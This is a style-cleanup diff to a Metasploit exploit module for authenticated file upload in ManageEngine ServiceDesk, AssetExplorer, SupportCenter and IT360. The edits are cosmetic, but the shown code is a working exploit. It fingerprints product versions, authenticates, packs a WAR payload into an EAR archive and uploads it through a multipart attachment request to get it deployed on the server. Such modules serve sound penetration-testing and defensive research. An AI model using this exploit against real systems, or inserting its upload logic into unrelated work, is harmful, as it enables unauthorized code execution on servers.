Do minor style changes

Author: jvazquez-r7

modules/exploits/multi/http/manageengine_auth_upload.rb

@@ -85,64 +85,67 @@ def initialize(info = {})
 
   def get_version
     res = send_request_cgi({
-      'uri'    => "/",
+      'uri'    => '/',
       'method' => 'GET'
     })
 
     # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
-    version = [ 9999, 9999, 0, "sd" ]
+    version = [ 9999, 9999, 0, 'sd' ]
 
     if res && res.code == 200
       if res.body.to_s =~ /ManageEngine ServiceDesk/
         if res.body.to_s =~ /  \|  ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
           output = $1
-          version = [ output[0].to_i, output[2].to_i, "0", "sd" ]
+          version = [output[0].to_i, output[2].to_i, '0', 'sd']
         end
         if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
           version[2] = $1.to_i
         elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine AssetExplorer/
-        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
-        res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
+            res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
           output = $1
-          version = [ output[0].to_i, output[2].to_i, 0, "ae" ]
+          version = [output[0].to_i, output[2].to_i, 0, 'ae']
         end
         if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
         # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
-        version[3] = "sc"
+        version[3] = 'sc'
         if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
           # ... but get the build number if we can find it
           version[2] = $1.to_i
         end
       elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
         # IT360 newer versions
-        version[3] = "it"
+        version[3] = 'it'
       end
     elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
       # IT360 older versions, not a very good detection string but there is no alternative?
-      version[3] = "it"
+      version[3] = 'it'
     end
-    return version
+
+    version
   end
 
 
   def check
     version = get_version
-    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd was fixed on build 9031; ae and sc still not fixed)
-    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == "sd") ||
-    (version[0] <= 6 && version[2] < 99999 && version[3] == "ae") ||
-    (version[3] == "sc" && version[2] < 99999)
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed
+    # sd was fixed on build 9031
+    # ae and sc still not fixed
+    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
+    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
+    (version[3] == 'sc' && version[2] < 99999)
       return Exploit::CheckCode::Appears
     end
 
-    if (version[2] > 9030 && version[3] == "sd") ||
-    (version[2] > 99999 && version[3] == "ae") ||
-    (version[2] > 99999 && version[3] == "sc")
+    if (version[2] > 9030 && version[3] == 'sd') ||
+        (version[2] > 99999 && version[3] == 'ae') ||
+        (version[2] > 99999 && version[3] == 'sc')
       return Exploit::CheckCode::Safe
     else
       # An IT360 check always lands here, there is no way to get the version easily
@@ -154,15 +157,15 @@ def check
   def authenticate_it360(port, path, username, password)
     if datastore['DOMAIN_NAME'] == nil
       vars_post = {
-          'LOGIN_ID' => username,
-          'PASSWORD' => password,
-          'isADEnabled' => "false"
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'false'
       }
     else
       vars_post = {
           'LOGIN_ID' => username,
           'PASSWORD' => password,
-          'isADEnabled' => "true",
+          'isADEnabled' => 'true',
           'domainName' => datastore['DOMAIN_NAME']
       }
     end
@@ -174,8 +177,8 @@ def authenticate_it360(port, path, username, password)
       'method' => 'POST',
       'uri' => normalize_uri(path),
       'vars_get' => {
-        'service' => "ServiceDesk",
-        'furl' => "/",
+        'service' => 'ServiceDesk',
+        'furl' => '/',
         'timestamp' => Time.now.to_i
       },
       'vars_post' => vars_post
@@ -210,14 +213,14 @@ def login_it360
     # Do we already have a valid cookie? If yes, just return that.
     if datastore['IAMAGENTTICKET'] != nil
       cookie_name = get_it360_cookie_name
-      cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
+      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
       return cookie
     end
 
     # get the correct path, host and port
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("/"),
+      'uri' => normalize_uri('/'),
     })
 
     if res && res.redirect?
@@ -242,7 +245,8 @@ def login_it360
         end
       end
     end
-    return nil
+
+    nil
   end
 
 
@@ -254,8 +258,8 @@ def login_it360
   def authenticate(cookie, username, password)
     res = send_request_cgi!({
       'method' => 'POST',
-      'uri' => normalize_uri("/j_security_check;" + cookie.to_s.gsub(";","")),
-      'ctype' => "application/x-www-form-urlencoded",
+      'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
+      'ctype' => 'application/x-www-form-urlencoded',
       'cookie' => cookie,
       'vars_post' => {
         'j_username' => username,
@@ -267,7 +271,7 @@ def authenticate(cookie, username, password)
     # sd and ae respond with 302 while sc responds with a 200
       res = send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri("/HomePage.do")
+        'uri' => normalize_uri('/HomePage.do')
       })
       return true
     else
@@ -279,14 +283,14 @@ def authenticate(cookie, username, password)
   def login
     # Do we already have a valid cookie? If yes, just return that.
     if datastore['JSESSIONID'] != nil
-      cookie = "JSESSIONID=" + datastore['JSESSIONID'].to_s + ";"
+      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
       return cookie
     end
 
     # First we get a valid JSESSIONID to pass to authenticate()
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("/")
+      'uri' => normalize_uri('/')
     })
     if res && res.code == 200
       cookie = res.get_cookies
@@ -307,7 +311,8 @@ def login
         end
       end
     end
-    return nil
+
+    nil
   end
 
 
@@ -322,18 +327,18 @@ def send_multipart_request(cookie, payload_name, payload_str)
 
     if @my_target == targets[1]
       # old style
-      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
       post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"vecPath\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"vec\"")
-      post_data.add_part("AttachFile", nil, nil, "form-data; name=\"theSubmit\"")
-      post_data.add_part("WorkOrderForm", nil, nil, "form-data; name=\"formName\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
+      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
+      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
       post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
-      post_data.add_part("Attach", nil, nil, "form-data; name=\"ATTACH\"")
+      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
     else
       post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
-      post_data.add_part(payload_str, "application/octet-stream", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
-      post_data.add_part("", nil, nil, "form-data; name=\"att_desc\"")
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
     end
 
     data = post_data.to_s
@@ -352,12 +357,12 @@ def pick_target
     return target if target.name != 'Automatic'
 
     version = get_version
-    if (version[0] <= 7 && version[2] < 7016 && version[3] == "sd") ||
-    (version[0] == 4 && version[3] == "ae") ||
-    (version[3] == "sc")
+    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
+    (version[0] == 4 && version[3] == 'ae') ||
+    (version[3] == 'sc')
       # These are all "old style" versions (sc is always old style)
       return targets[1]
-    elsif version[3] == "it"
+    elsif version[3] == 'it'
       return targets[3]
     else
       return targets[2]
@@ -389,9 +394,9 @@ def exploit
     # Zipping with CM_STORE to avoid errors while decompressing the zip
     # in the Java vulnerable application
     ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
-    ear_file.add_file("META-INF/application.xml", app_xml)
-    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
+    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+    ear_file.add_file('META-INF/application.xml', app_xml)
+    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
 
     if @my_target != targets[3]
       # Linux doesn't like it when we traverse non existing directories,
@@ -409,7 +414,7 @@ def exploit
     res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
     if res && res.code == 200
       print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      " seconds for deployment")
+      ' seconds for deployment')
       sleep(datastore['SLEEP'])
     else
       fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")